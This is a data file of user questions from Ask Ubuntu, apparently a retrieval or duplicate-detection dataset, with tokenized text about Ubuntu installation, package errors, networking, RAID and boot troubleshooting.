350203	problem : `` npm err ! cb ( ) never called ! npm err ! not ok code 0 '' when installing etherpad	on an ubuntu 12.04.3 : adduser -- system -- home=/var/www/etherpad -- group etherpad apt-get install gzip git-core curl python libssl-dev build-essential abiword python-software-properties add-apt-repository ppa : chris-lea/node.js apt-get update ; apt-get install -y nodejs su - etherpad -s /bin/bash git clone git : //github.com/ether/etherpad-lite.git cd etherpad-lite sed -i 's/bin\/installdeps.sh/sh bin\/installdeps.sh/g ' bin/run.sh sh bin/run.sh but when using sh bin/run.sh : ensure that all dependencies are up to date ... if this is the first time you have run etherpad please be patient . npm err ! cb ( ) never called ! npm err ! not ok code 0 q : how can i resolve this problem ? `` npm cache clear did n't '' helped . the fs is mounted with noexec . system is up-to-date .
350204	error : can not access ppa while installing openstack swift	i was trying to install openstack swift all in one . getting the error as follows : root @ openstack-virtualbox : /home/openstack # apt-add-repository ppa : swift-core/ppa can not access ppa ( https : //launchpad.net/api/1.0/~swift-core/+archive/ppa ) to get ppa information , please check your internet connection . whether i use apt-add or add-apt.. error remains the same . root @ openstack-virtualbox : /home/openstack # add-apt-repository ppa : swift-core/ppa can not access ppa ( https : //launchpad.net/api/1.0/~swift-core/+archive/ppa ) to get ppa information , please check your internet connection . please let me know the issue with this .
350208	what does 2 > /dev/null mean ... ?	i want one or two line description about the following command line : grep -i '\/support\/security\/bulletins\/ ' content 2 > /dev/null
350209	can i connect my iphone now that i have updated to ios 7 ?	basically , i get an endlessly looping pop-up asking `` do i want to trust this computer ? '' when i click 'trust ' it just wo n't connect . will this problem ever be solved or should i just restore to a previous version of ios , or perhaps there is a way of using itunes through playonlinux or some other solution ?
350211	i ca n't open links neither in okular , mupdf nor xpdf	is it a bug in viewers or a property that if i click a link in a pdf , nothing happens in okular and mupdf outputs `` could n't get a file descriptor referring to the console '' ? xpdf outputs warning : can not convert string `` -*-helvetica-medium-r-normal -- 12-*-*-*-*-*-iso8859-1 '' to type fontstruct warning : can not convert string `` -*-courier-medium-r-normal -- 12-*-*-*-*-*-iso8859-1 '' to type fontstruct warning : can not convert string `` -*-times-bold-i-normal -- 20-*-*-*-*-*-iso8859-1 '' to type fontstruct warning : can not convert string `` -*-times-medium-r-normal -- 16-*-*-*-*-*-iso8859-1 '' to type fontstruct syntax error : could n't create a font for 'rxaues+cmr10' syntax error : could n't create a font for 'ejastl+cmr7' segmentation fault ( core dumped ) i thought that they will open the www-browser . here is my test file : ( i know it is silly to use the package finnish babel in english document but i just made a quick test file for to demostrate . ) \documentclass [ a4paper ] { amsart } \usepackage [ utf8 ] { inputenc } \usepackage [ finnish ] { babel } \usepackage { url } \usepackage [ ] { hyperref } \begin { document } see also \href { http : //www.google.com/ } { google } . \end { document } compiled by pdflatex test.tex . compilation gave this is pdftex , version 3.1415926-2.4-1.40.13 ( tex live 2012/debian ) restricted \write18 enabled . entering extended mode ( ./test.tex latex2e < 2011/06/27 > babel < v3.8m > and hyphenation patterns for english , dumylang , nohyphenation , et hiopic , farsi , arabic , pinyin , croatian , bulgarian , ukrainian , russian , slovak , czech , danish , dutch , usenglishmax , ukenglish , finnish , french , basque , ngerma n , german , swissgerman , ngerman-x-2012-05-30 , german-x-2012-05-30 , monogreek , g reek , ibycus , ancientgreek , hungarian , bengali , tamil , hindi , telugu , gujarati , sanskrit , malayalam , kannada , assamese , marathi , oriya , panjabi , italian , lati n , latvian , lithuanian , mongolian , mongolianlmc , nynorsk , bokmal , indonesian , e speranto , coptic , welsh , irish , interlingua , serbian , serbianc , slovenian , friu lan , romansh , estonian , romanian , armenian , uppersorbian , turkish , afrikaans , i celandic , kurmanji , polish , portuguese , galician , catalan , spanish , swedish , th ai , loaded . ( /usr/share/texlive/texmf-dist/tex/latex/amscls/amsart.cls document class : amsart 2009/07/02 v2.20.1 ( /usr/share/texlive/texmf-dist/tex/latex/amsmath/amsmath.sty for additional information on amsmath , use the ` ? ' option . ( /usr/share/texlive/texmf-dist/tex/latex/amsmath/amstext.sty ( /usr/share/texlive/texmf-dist/tex/latex/amsmath/amsgen.sty ) ) ( /usr/share/texlive/texmf-dist/tex/latex/amsmath/amsbsy.sty ) ( /usr/share/texlive/texmf-dist/tex/latex/amsmath/amsopn.sty ) ) ( /usr/share/texlive/texmf-dist/tex/latex/amsfonts/umsa.fd ) ( /usr/share/texlive/texmf-dist/tex/latex/amsfonts/amsfonts.sty ) ) ( /usr/share/texlive/texmf-dist/tex/latex/base/inputenc.sty ( /usr/share/texlive/texmf-dist/tex/latex/base/utf8.def ( /usr/share/texlive/texmf-dist/tex/latex/base/t1enc.dfu ) ( /usr/share/texlive/texmf-dist/tex/latex/base/ot1enc.dfu ) ( /usr/share/texlive/texmf-dist/tex/latex/base/omsenc.dfu ) ) ) ( /var/lib/texmf/tex/generic/babel/babel.sty ( /usr/share/texlive/texmf-dist/tex/generic/babel/finnish.ldf ( /usr/share/texlive/texmf-dist/tex/generic/babel/babel.def ) ) ) ( /usr/share/texlive/texmf-dist/tex/latex/url/url.sty ) ( /usr/share/texlive/texmf-dist/tex/latex/hyperref/hyperref.sty ( /usr/share/texlive/texmf-dist/tex/generic/oberdiek/hobsub-hyperref.sty ( /usr/share/texlive/texmf-dist/tex/generic/oberdiek/hobsub-generic.sty ) ) ( /usr/share/texlive/texmf-dist/tex/latex/graphics/keyval.sty ) ( /usr/share/texlive/texmf-dist/tex/generic/ifxetex/ifxetex.sty ) ( /usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty ) ( /usr/share/texlive/texmf-dist/tex/latex/hyperref/pd1enc.def ) ( /usr/share/texlive/texmf-dist/tex/latex/latexconfig/hyperref.cfg ) ) package hyperref message : driver ( autodetected ) : hpdftex . ( /usr/share/texlive/texmf-dist/tex/latex/hyperref/hpdftex.def ( /usr/share/texlive/texmf-dist/tex/latex/oberdiek/rerunfilecheck.sty ) ) ( ./test.aux ) ( /usr/share/texlive/texmf-dist/tex/latex/amsfonts/umsa.fd ) ( /usr/share/texlive/texmf-dist/tex/latex/amsfonts/umsb.fd ) ( /usr/share/texlive/texmf-dist/tex/latex/hyperref/nameref.sty ( /usr/share/texlive/texmf-dist/tex/generic/oberdiek/gettitlestring.sty ) ) ( ./test.out ) ( ./test.out ) [ 1 { /var/lib/texmf/fonts/map/pdftex/updmap/pdftex.map } ] ( ./test.aux ) ) < /usr/share/texlive/texmf-dist/fonts/type1/public/amsfonts/cm/c mr10.pfb > < /usr/share/texlive/texmf-dist/fonts/type1/public/amsfonts/cm/cmr7.pfb > output written on test.pdf ( 1 page , 19384 bytes ) . transcript written on test.log .
350213	ubuntu 13.04 ca n't read arabic texts	i 'm using ubuntu 13.04 , it ca n't read arabic letters and words properly . that what i get when i open files contains arabic , please notice that same files are showed correctly on windows : çáþçäæä íìèñ çáíåæï úáì çáúíô èãäøþé ãúòæáé ãä çáãïíäé êïúì çáìíêæ
350214	oracal virturalbox and ubuntu server 12.04.3 network connection problems	i am new to ubuntu and vms . i want my test ubuntu vm running in oracal virtualbox to have a network connection and visable on my lan and vpn ( wan ) . i do not want anyone to see the actual machine , just the vm server on the hhtp side ( port 80 ) with the possibility of telnet as a fail-safe . anyone know how i can do this ? i have no idea how to make this test server work !
350215	can i install ubuntu on my tablet zte v9c ?	can i install ubuntu on my tablet zte v9c it has 275 mb of phone storage and 512mb of ram
350218	how can i make qq work in ubuntu ?	i work in a small office and several of the people i work with are contemplating the switch to linux . however , we need qq to work . one person has it half working with pidgin , but half working is not working . i have tried to find relevant tutorials online . my only satisfaction is the realization that in the comments of the tutorials , no one else seems to have been able to make them work either . it does not matter if the client works in english or chinese , but i need the client to work , and so far this has not happened . so , back to my question , how do i get qq to work in linux ?
350220	deluge : how to categorize torrents ?	i 'd like to assign custom labels to torrents the way i did in âľtorrent for example . or any other way to categorize them . as far as i can tell , there must be label plugin bundled with deluge , but does it really work ? i do n't see any way to assign labels . if not , are there other torrent clients able to do this ?
350222	running a .sh file without root	i 've recently downloaded a game ( mark of the ninja from humble bundle 9 to be exact ) to play on ubuntu . from what i can tell after extracting the game , it is stand-alone and does n't require installation on the computer you want to play it on ( i want to play it off my flash drive at university ) . however , as i do n't have root access on the computers at university , i ca n't use chmod +x ninja-bin to allow executing the main ninja-bin.sh file as a program instead of opening it in gedit . also , when i try executing it via the terminal using ./ninja-bin i get bash : ./ninja-bin : permission denied . is there any workaround for this for which i do n't need root access ? or should i just not try to play games on a computer which i do n't have root for ? thanks
350226	does juju helps to build own private cloud ?	will juju help me to create my own cloud for my organization , we want to create private cloud for my organisation if it helps what are the guidelines that we need to got through ?
350227	winetricks downloading error	whenever i use this command in terminal : winetricks atmlib gdiplus ie6 vcrun2005sp1 vcrun2008 fontsmooth-rgb corefonts msxml3 msxml6 vcrun2010d i get this : -- 2013-09-26 12:12:41 -- ( try : 3 ) http : //download.microsoft.com/download/e/6/a/e6a04295-d2a8-40d0-a0c5-241bfecd095e/w2ksp4_en.exe connecting to download.microsoft.com ( download.microsoft.com ) |42.2.33.96|:80 ... failed : no route to host . connecting to download.microsoft.com ( download.microsoft.com ) |2a02:2160:5541:49 : :4de8 : d968|:80 ... failed : network is unreachable . connecting to download.microsoft.com ( download.microsoft.com ) |2a02:2160:5541:49 : :4de8 : d969|:80 ... failed : network is unreachable . retrying . is there any other solution to get those dependencies ? thanks in advance
350228	pendrive shown correctly in gparted but not in df -h	my pendrive ( cruzer/sandisk 4gb ) is recognized correctly by gparted but it is not listed in df -h. it was working fine just few hours ago , i tried rebooting but it does n't show anymore . on the other side , i have managed to copy to it an iso-image with dd , referring to it with the name listed in gparted : /dev/sdb .
350231	book on how to use ubuntu	can someone suggest me a free e-book on how to use ubuntu ( shell-scripting , commands and stuff ) ? i am fairly new to ubuntu and am using 13.04 .
350232	can i use amd64 installers on intel based systems ?	i 'm new to ubuntu . i installed ubuntu-13.04-server-amd64 on msi h67ma-e35 ( b3 ) . after system reboot , i only get a `` blinking underscore '' _. i have tried multiple time to reinstall . i boot from the correct drive . can the image i 'm using for amd systems be used for intel based systems as well ?
350236	running .py python scripts from the command line using python3	i am currently able to run .py python scripts from a terminal due , i believe , to this inclusion in my .profile file : export pythonpath=/home/myplace/python python being the directory where i put all my home rolled scripts . the thing is that the default interpreter is python 2 and i 'd like to be able to run python 3 scripts the same way . is there a way to indicate in a .py script which interpreter to use ? i 've seen ample warnings against changing the default interpreter and it 's not something i want to do anyway . tia
350238	help choosing 64 bit based os ?	i am writing to ask if my amd phenom 9550 quad core processor wil be able to run a 64bit flavour of ubunto raring ringtail . any help is appreciated ! cheers , nathaniel
350241	can not install wine using terminal	i 've tried to install wine in ubuntu 12.10 through terminal . i write this script to install wine : sudo apt-get install wine but its is showing this error : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . void @ void : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? please tell me some solution for this problem or tell me some alternative to install wine in my system .
350243	problem with upload images openstack	i 'm working with maas and juju . and i use 6 nodes for openstack . everything goes good ! but when i try to upload ubuntu-cloud-image there are errors . thu sep 26 09:43:43 utc 2013 : ====== extracting image ====== warning : no ramdisk found , assuming ' -- ramdisk none' kernel : oneiric-server-cloudimg-amd64-vmlinuz-virtual ramdisk : none image : oneiric-server-cloudimg-amd64.img thu sep 26 09:44:01 utc 2013 : ====== bundle/upload kernel ====== failed to upload bundle to images/oneiric-server-cloudimg-amd64-vmlinuz-virtual.manifest.xml failed : euca-upload-bundle -- bucket images -- manifest /tmp/cloud-publish-image.relvsn/oneiric-server-cloudimg-amd64-vmlinuz-virtual.manifest.xml s3_url not specified . trying http : //localhost:8773/services/walrus checking bucket : images [ errno 111 ] connection refusedfailed to upload kernel how can i fix it ?
350248	ubuntu touch os for olivepad vt100	my name is arnosh and i have currently olivepad vt100 with android froyo running on it . i would like to know can i port ubuntu touch os on my tablet and if yes how can i get started with it . thanks regards , arnosh
350249	missing sound in youtube	i 've just downloaded and installed ubuntu 12.04 alongside windows 7 . but being new to the system , i notice that there is no sound on youtube videos , whether it is a downloaded video or directly from youtube . sound seems to work in all other applications . how do i solve the missing sound in youtube issue ? i am new to ubuntu and ca n't rely on videos because of this problem , so a step by step help would be most appreciated ... thank you for taking the time ...
350250	ubuntu 13.04 random crashes	i 'm having a problem which seems to get worse as time goes on . i 'm having random crashes ( image links at the bottom ) , it used to happen about once a week or so , but now it happens a few times a day . i had this one 12.04 , and hoped that upgrading to 13.04 would solve it , but after a few months with 13.04 , it 's still happening . sometimes it 's general protection fault , sometimes page fault , sometimes , something else , and it 's on different processes too . mostly chrome , but not just . i ran memorytest for the night but that did n't seems to do anything . images : chrome crash update-apt-xapl crash system info : lenovo b570 , intel i3-2310 @ 2.10 ghz 64 bit , 8gb ram os is 13.04 64bit edit something i forgot to mention , and might be important . my machine is dual-boot with windows 7 professional 64bit . even though i hardly ever log in to my windows os , maybe once a month if at all , i did n't seem to have any crashes or anything inside windows any suggestions ? i do n't want to format my computer if i can avoid it .
350256	why is my `` sudo fdisk -l '' output so messy ?	how do i fix this and is it even a problem . sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000c5518 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 1953523711 976510977 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 501760 1953523711 976510976 8e linux lvm disk /dev/sdb : 8012 mb , 8012390400 bytes 24 heads , 9 sectors/track , 72450 cylinders , total 15649200 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000437 device boot start end blocks id system /dev/sdb2 2048 15648767 7823360 5 extended /dev/sdb5 501760 15648767 7573504 8e linux lvm disk /dev/mapper/joseph -- debian-root : 7381 mb , 7381975040 bytes 255 heads , 63 sectors/track , 897 cylinders , total 14417920 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/joseph -- debian-root does n't contain a valid partition table disk /dev/mapper/joseph -- debian-swap_1 : 369 mb , 369098752 bytes 255 heads , 63 sectors/track , 44 cylinders , total 720896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/joseph -- debian-swap_1 does n't contain a valid partition table disk /dev/mapper/xubuntu -- vg-root : 991.4 gb , 991399247872 bytes 255 heads , 63 sectors/track , 120530 cylinders , total 1936326656 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/xubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/xubuntu -- vg-swap_1 : 8497 mb , 8497659904 bytes 255 heads , 63 sectors/track , 1033 cylinders , total 16596992 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/xubuntu -- vg-swap_1 does n't contain a valid partition table i 'm definitely a newbie and am used to a much simpler output . what is disk /dev/mapper ? i 've never seen that before , and have only seen it now with fresh install of xubuntu over ubuntu-gnome edition . thanks .
350260	reinstall without wiping /home	i want to upgrade from 32 bit to 64 bit which means reinstalling . however i do n't want to wipe out /home . my mount looks like mount /dev/mapper/ubuntu-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda1 on /boot type ext2 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) vmware-vmblock on /run/vmblock-fuse type fuse.vmware-vmblock ( rw , nosuid , nodev , default_permissions , allow_other ) gvfsd-fuse on /run/user/raph/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=raph ) is there some way to protect /home during the reinstall or do i need to buy another hard drive to back it all up ?
350262	no usb boot after installed ubuntu 12.04	i installed ubuntu 12.04 server on a samsung net book `` np-n100s-e02 from a usb stick the first time i booted this netbook after purchased it , now i ca n't find usb boot options in the bios setup . always the boot devices priority has no more than the sta toshiba harddisk . somebody mentioned that grub could put itself on the usb mbr , that 's why maybe usb boot does n't exist anymore . i 'm asking if anybody confirm what i 've been told or provide me with some advices on how to fix that , i 'm really feeling lost
350266	how can i create a raid array with > 2tb disks ?	i would like to know the correct way to set up a software raid array on an existing server . i have two brand new 3tb disks to use for the array . specifically , i want to set up a 3tb raid 1 array , formatted to ext4 , not using lvm . but a more general answer might help others with instructions from start to finish . i have tried a number of guides : how to implement raid 1 ? - only covers part of the process setup of two additional ssd drives in raid 1 - ends up with an array of 2tb rather than 3tb add two new hdd in raid 1 - only uses 1tb drives i also found these resources : http : //richard.blog.kraya.co.uk/tag/mdadm/ - for centos and does not cover updating mdadm.conf and other steps http : //www.technotes.se/ ? p=1732 - comprehensive but complicated and not specifically written for ubuntu the initial partitioning of the drives appears to be key ; the last link above mentions this in detail , but the previous link seems to achieve the same result and is simpler .
350267	what 's the point of adding extra gb of drive space to the ubuntu partition beyond what the os needs ?	i 'm installing alongside windows . my hd has ~1 tb of space . i 'm assuming when installing , if i ask the installer to partition 400 gb of space for ubuntu , this would leave ~600 gb of space for windows . but how is this 400 gb used ? will it be used for me to save any random files i end up saving ? ( e.g . music , photos , apps , etc. ? ) or will it be used for some weird tech reason that i , as a casual user , am not aware of or concerned with ?
350276	help i 've made a mess with my encrypted folder	i have ubuntu installed on my laptop with the home folder encrypted . yesterday trying to remove duplicate files in my music , photos and documents i 've utilized fdupes in my entire home folder . for error i 've delete a lot of small files around the home that probably had the same size , so they were indicated as duplicated files . just after doing it i 've been aware that probably i 've messed up something , but the system continued working . this morning when i 've tried to login in my user , after entering the password and pressing enter it just flashed dark and returned to the login screen . is there a way to repair the system ? i know that there is a way to try to recuperate the files in my home from a live usb , but after that i would have to reinstall the system and reconfigurate everithing , if possible i would like to repair the system . a good thing is that i have a backup around two month old done with dejadup where probably i could take the small file that is missing and is making impossible to login . thank you for your attention , and sorry for the wall of text .
350277	creating the two column design of a scientific paper	i want to create a document similar to the format of the following paper : https : //dl.dropboxusercontent.com/u/84207818/neural-network-based-phy-layer-key-exchange-for-wireless-communications.pdf the above format is the design of a scientific paper , thus are there any guides or ways to create a document with a similar design ? in tex , libreoffice or anything ?
350279	persistant drive viewable files	i created a persistant drive of 500mb on my 4 gig usb drive using netbootin and a linux image . if i choose to save files ( word documents , pictures ) where do i see the persistant drive to save them too . looked in mnt folder and do n't see it there . where can i save them so i have at next re-boot or if i use a different computer . thank you .
350283	help , linux beginner ! how do i put ubuntu on usb and boot/install on a pc with blank harddrive ?	i wonder if someone can help me ? i am fairly new to trying to actually understand and use computers myself rather than just buying whatever windows/mac wants me to ! you will get a giggle from my flawed attempts anyway : - ) i would like to start using ubuntu on my pc , just got a new harddrive and did have a borrowed windows 7 disk as was planning to temporarily install it so i could get ubuntu . however i did n't have high enough spec hardware for win 7 ( i think it is due to only 1gb ram , i do have 64 bit technology and a 1tb harddrive ) . i am quite happy to install 32 bit ubuntu and hear it is easier the use than 64 anyway . so i have one other rubbish mini laptop ( windows xp ) which i am trying to use to get ubuntu onto a usb ( laptop has no cd drive ) so i can install it on the pc . first tried just downloading ubuntu 13.04 desktop onto a usb and trying to boot the pc from it which gave the message 'no operating system ' . then i tried this to create a bootable usb which sounded promising : http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ . however then it starting asking for my saucy desktop iso in order to install it onto the usb stick , ca n't really manage to find out what a saucy desktopp iso is , maybe a mirror image of an operating system , no idea why i would need that . so in short , i 'm lost . all i can think of is getting windows xp somewhere so i can get my pc to work and install ubuntu from the internet on that , or going to a friends house in the hope that creating a bootable cd is easier than creating a usb . sorry for my general ineptness and hope someone can help !
350284	ca n't set my background	this is mystifying me . i have tried all other solutions that i could find and none seem to work . the 'appearance ' menu has disappeared from settings . i 'm using gnome-classic . here 's what i 've tried so far : 1 ) right click - > change desktop background this just brings up settings 2 ) gnome-control-center background same as above which is annoying . it also brings up this : [ _log_level_fatal 12:41:31.369606 ] switchboard.vala:201 : could n't find background.plug among the loaded settings . [ _log_level_fatal 12:41:31.369641 ] switchboard will not function properly . 3 ) apt-get install gnome-control-center-unity to which i get e : unable to locate package gnome-control-center-unity
350285	ubuntu 13.04 - mount.cifs always ask for password	i 've created a script to mount the windows server network shares , but it keeps me asking for the network password . i 've already tried setting the passwd env var and setting the password in the command . here 's what i have : sudo mount.cifs //ip/utils /media/data/utils -o username=sergio , password=mypassword ... , uid=sergio , file_mod=0755 , dir_mode=0755 , gid=sergio , workgroup=myworkgroup i tried also with sec=ntlm ( looked at another question , do n't remember where ) but no avail . why it keeps me asking the password ?
350289	ubuntu server 2 nic 's one for lan and one for internet one router	i have done a bit of research but i can find anything for my specific situation . this is my network infrastructure the ubuntu server has a 6tb lvm that serves media + a newsgroup indexer i want to have one nic on the server used for internet use and one for serving lan i want to limit the internet using wondershaper so it does n't max it out for the other 10+ devices on the network . the other will be open so that serving media is n't hamstrung when i try and limit one of the interfaces . the problem is that all traffic is pushed through eth0 . therefore if i shape eth0 it also shapes all lan and internet traffic . i just had a thought about running one of the lan cables directly to the router . at present they are both plugged into the switch . edit : i have now changed it so that eth1 connects to the router directly and eth0 remains to be connected to the switch my routing table is as follows . destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0
350292	windows 8 integration into grub	i would like to integrate windows 8 integrate into grub without its loader . can i do this ? if yes , how ? loader loads slowly .
350297	how to limit user access to selected applications ?	i would like to give a user ( mom and dad ) only access to these 4 applications : google chrome libreoffice calc and writer vlcplayer of course they are locked in the user home directory . and also of course : they must be able to change volume and print documents . it is close to a kiosk ; - ) what is the best way to tackle this ? i 'm running 12.04 ( 64 ) . ( pessulus and lockout are not available ? )
350298	password to activate ubuntu one	i tried many times to get a password for ubuntu one , but never received a mail ( checked spam and junk ) . does anybody know a solution ? maybe it is a silly question but i did not find a solution .
350299	script to update host file	i have the following command that correctly creates the /etc/hosts file that i want to build . however , i can not write it per the 2nd form due to permissions , of course . so i tried variations of the 3rd form , but it still errors on permissions . can someone give me a suggestion to try ? cat hosts.tmp ; echo -n `` myremotehost `` ; cat ip.txt cat hosts.tmp ; echo -n `` myremotehost `` ; cat ip.txt > /etc/hosts cat hosts.tmp ; echo -n `` myremotehost `` ; echo mypassword | sudo -s cat ip.txt > /etc/hosts
350302	will vlc from the software center receive the same updates as the stable ppa ?	vlc 2.1.0 has been released . my computer runs 12.04 and the lastet vlc version is currently 2.0.8 . will the vlc 2.1.0 update be availabe for me as well ( with a slight delay maybe ) , or is it recommended to add the ppa : videolan/stable-daily ppa to receive updates ?
350305	help please ? downloaded ubuntu 13.04 onto usb and ca n't find .iso file in order to create a bootable usb	i asked a question which was immediately merged with this question : how do i install ubuntu from an usb drive / create a live usb-stick ? . i can understand most of what is said there , except that when i try and use http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ to create a bootable usb ( i want to create one with a laptop which has no cd drive so i can install in on my pc with new blank harddrive ) , i ca n't find the .iso file . i downloaded ubuntu 13.04 desktop onto my usb and extracted all the files . so when i am on that universal usb installer i am browsing for .iso files among the ubuntu 13.04 files i downloaded but just ca n't find one ! to be honest i am a beginner and barely know what a .iso file is so please bear with me , be amused and help me not go back to windows !
350306	example of text entry in appindicator menu	i have written an app indicator , which currently has a menu . i would like one of the menu entries to be a short text entry field instead . is this possible , and if so , where should i look for an example or documentation ? ( the calendar and volume indicators have more complex dropdowns , so it look possible . )
350308	apach2-mpm-worker problem	i have a big problem with apache2 under ubuntu 13.04. sudo service apache2 start no apache mpm package installed sudo apt-get install apache2.2-bin apache2.2-common apache2-mpm-worker ls -a /usr/lib/apache2/mpm-worker/ empty dir ls -l /usr/sbin/apache2 -- > ../lib/apache2/mpm-worker/apache2 so there is something really wrong . how can i solve this bug ? i tried to purge and reinstall all these packages but nothing changed .
350310	tvtime not changing audio mode	i newly installed 12.04 instead of 9.10 . have a avermedia avertv studio 303 tv-card . could n't get the audio output , but this thread helped me . the only problem now is that preferred audio mode is stuck to mono . i tried to change the tvtime configuration files , but it changes back to mono automatically . what can be done to fix it ? thanks in advance for your replies !
350312	i am not able to install easy_install in my ubuntu	i have to install review board in ubuntu , i tried following commands but i am getting error sudo apt-get install python-setuptools . reading package lists ... done building dependency tree reading state information ... done package python-setuptools is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package python-setuptools has no installation candidate then i tried below command but for this also i am getting error message : apt-get upgrade e : could not open lock file /var/lib/dpkg/lock - open ( 13 permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? what should i do ? please help me out ! ! ! ! !
350318	is it possible to use gnome maps in ubuntu with unity ?	omgubuntu featured a gnome maps application which i would very much like to use in ubuntu as well . is this possible to use gnome maps at all on a default installation of ubuntu 12.04 - or should i expect unity related issues ? ( of course i could just go ahead , download and install gnome maps . but fact is that i ca n't find a way of getting hold of the software really - i 'm new to this . therefore i 'm asking this question hypothetically . )
350320	how to ping an idn domain with its non-ascii name ?	for all i see , i can not ping ( or dig ) idn domain names using their non-ascii names , only their ascii 'backend ' with xn -- prefix . i am about to add several such names to the configuration of a dns server i manage , apparently it works with browsers , but not with lower-level tools , which is somewhat inconvenient , as looking up punycode names every time i test or debug something is a major nuisance . e.g . http : //ąćęłńóśźż.pl ( apparently 'hyperlink ' formatting option mangles the idn name , so not using it here on purpose ) - a test page for checking if browser supports polish idns - works with firefox , but not with ping or dig . is there some way ( ppa , patch , whatever ) to obtain such functionality ? using 12.04 , iputils-ping 3:20101006-1ubuntu1 and dnsutils 1:9.8.1.dfsg.p1-4ubuntu0.7 .
350325	remove ubuntu entry efi	i installed ubuntu and then i deleted it by using the disk administrator in windows 8 ( i installed ubuntu partion along side to windows 8 ) ... .now i 'd like to remove the ubuntu entry in the boot ; the problem is there 's no way i can delete it ! i tried inside the boot manager to check `` delete boot option '' and then select ubuntu ... .but nothing ! i tried this how can i remove ubuntu from the uefi boot options ? but nothing ! can you help me ? thanks !
350326	lightdm crashes on skype or dmenu start	i 'm using the proprietary nvidia-313 driver for my gtx 460 . ever since i had some harddrive problems and had to recreate the xconfig , when i want to start skype or dmenu , lightdm seems to crash , because the next thing that happens is that i am back at the login screen . i already tried to reinstall lightdm and to rewrite the xconfig via the nvidia driver . nothing helped so far . i 've no idea , why just these particular programs are affected . neither a terminal window , nor firefox or thunderbird or whatever else is affected . i tried to google this , but i had no luck there either .
350327	roundcube not sending email	i tried to set up an email server with dovecot-postfix and using roundcube as the webmail application . the problem is that i can see and receive emails inside roundcube but when i try to send one , the recipăźent does n't receive it , although roundcube prompts `` message succesfully sent '' . i used mutt to check if i can send mail from the server , and is working ok. what could possibly go wrong here ?
350328	how to blacklist-bcm43.conf file from being automatically edited ?	hello ubuntu community , i have a dell inspiron e1505 running ubuntu 12.04 lts . when i first installed the operating system , my broadcom wired network module was n't recognized . i was able to troubleshoot that issue to the blacklist-bcm43 conf file and i commented out the `` blacklist b43 / blacklist b43 legacy / blacklist b44 '' lines . this fixed the issue until today when , after updating the os , the lines became unhashed once again . i went in to fix it , but after about a minute of internet use , the lines became unhashed yet again . the only website i was trying to access was drive.google.com is there some way to prevent the system from editing the blacklist-bcm conf file , or use another work around to bypass the blacklist ? also , i 'm a bit of an ubuntu novice ( ~1 year with the os , ~2 years with linux in general ) so the more step-by-step the explanation , the better . thank you , john
350332	nautilus : `` send via bluetooth '' in context menu	i use nautilus as my default file manager . very frequently i need to transfer files to other devices via bluetooth . is there some way to add a `` send via bluetooth '' option in the right click context menu for a selected file , or for a selection of multiple files ? thanks in advance .
350334	how do i clear a print-queue in ubuntu13.04 ?	i am an absolute beginner with ubuntu and i appear to have a long queue of documents in my h.p . 840c printer .
350340	ubuntu tablet on pipo m8 pro	i recently purchased a pipo m8 pro ( http : //www.pipo.cn/en/index.php ? m=product & a=show2 & type=2 & id=269 ) and would like to know if i can install ubuntu for tab . if i can , can you also advice how i should install it . thanks , faazil
